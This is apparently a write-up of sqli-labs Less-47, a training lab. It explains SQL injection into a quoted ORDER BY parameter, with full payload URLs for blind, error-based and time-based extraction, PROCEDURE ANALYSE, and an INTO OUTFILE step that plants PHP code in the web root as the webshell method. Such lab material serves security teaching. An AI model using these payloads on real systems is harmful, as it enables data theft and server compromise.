Sqli-labs less 47

Source: Internet
Author: User
Tags: rand

Less-47

The SQL statement for this level is $sql = "SELECT * FROM users ORDER BY '$id'";

The id is wrapped in single quotes, so MySQL treats it as a string literal rather than a column reference. Following the reasoning from the earlier levels, we still classify the payloads by where the injection lands.

  1. The parameter after ORDER BY

    (1) Injection with and. Because ORDER BY sorts by a string literal here, all we can do is close the quote and append a condition with and; that gives us error-based and time-based injection. A few example payloads follow.

    ① and combined with rand(). Payload: http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand(ascii(left(database(),1))=115)--+

    With 115 changed to 116: http://127.0.0.1/sqli-labs/Less-47/index.php?sort=1%27and%20rand(ascii(left(database(),1))=116)--+

    The idea is that the true and false conditions seed rand() differently and so change the row order. In later tests this did not give consistent results, so it cannot be used for accurate injection; left() is used here only as an illustration.

    ② Error-based injection

    http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20(select%20count(*)%20from%20information_schema.columns%20group%20by%20concat(0x3a,0x3a,(select%20user()),0x3a,0x3a,floor(rand()*2)))--+

    The "Duplicate entry" error message contains the value of user(); the subquery can be replaced with other statements to extract more data.

    The next payload is also error-based and works on the same principle as the one above: both make MySQL complain about a duplicate. In the payload above the duplicate arises because floor(rand()*2) is evaluated more than once while MySQL builds the temporary table for group by (the deterministic variant floor(rand(0)*2) is often used for this); in the one below it is a duplicate column name.

    http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20(select%20*%20from%20(select%20name_const(version(),1),name_const(version(),1))x)--+

    version() is used twice as a column name in the derived table, so MySQL raises a "Duplicate column name" error that carries the version string. name_const() only accepts constant arguments, which is why version() is the function used here.

    ③ Time-based injection

    http://127.0.0.1/sqli-labs/Less-47/?sort=1%27and%20if(ascii(substr(database(),1,1))=115,0,sleep(5))--+

    The database is named security, so the ASCII value of its first letter s is 115 and the page comes back immediately; with 116 or any other value the response is delayed by five seconds. We do not show a screenshot here; the character-by-character extraction can be scripted.

    (2) Injection in the PROCEDURE ANALYSE parameter

    PROCEDURE ANALYSE can be appended after ORDER BY and gives us another error-based injection. A LIMIT clause may also sit between ORDER BY and PROCEDURE ANALYSE, so in practice an injection point inside LIMIT can be exploited with PROCEDURE ANALYSE in the same way. Note that PROCEDURE ANALYSE only exists in MySQL 5.x: it was deprecated in 5.7 and removed in 8.0.

    An example:

    http://127.0.0.1/sqli-labs/Less-47/?sort=1%27procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

  2. Writing the query result to a file with INTO OUTFILE

    http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.txt%22--+

    This writes the query result to a file. It requires the MySQL FILE privilege, and secure_file_priv must allow writing to that directory.

    From here we can write a webshell instead, using lines terminated by:

    into outfile "c:\\wamp\\www\\sqllib\\test1.txt" lines terminated by 0x... (the webshell converted to hexadecimal)

    http://127.0.0.1/sqllib/less-47/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.php%22%20lines%20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+

    The hex string decodes to <?php phpinfo();?>, so each row of the result written to test.php is followed by that PHP code.

    Now visit test.php: the phpinfo() output confirms the file was written and is executed by the web server.
